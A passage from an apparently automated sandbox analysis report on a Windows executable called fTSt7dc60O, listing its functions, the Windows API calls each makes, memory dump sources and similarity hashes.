                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                      • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                      Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FilePointerwsprintf
                                                      • String ID:
                                                      • API String ID: 327478801-0
                                                      • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                      • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                      • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                      • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                      Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                      • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                      • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                      • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                      Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                      • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                      • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                      • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                      Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                      Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                      Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                      • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                      • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                      • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                      Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                      • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                      • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                      • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                      Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                      Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                      Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                      Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                      • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                      • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                      • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

                                                      Non-executed Functions

                                                      Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
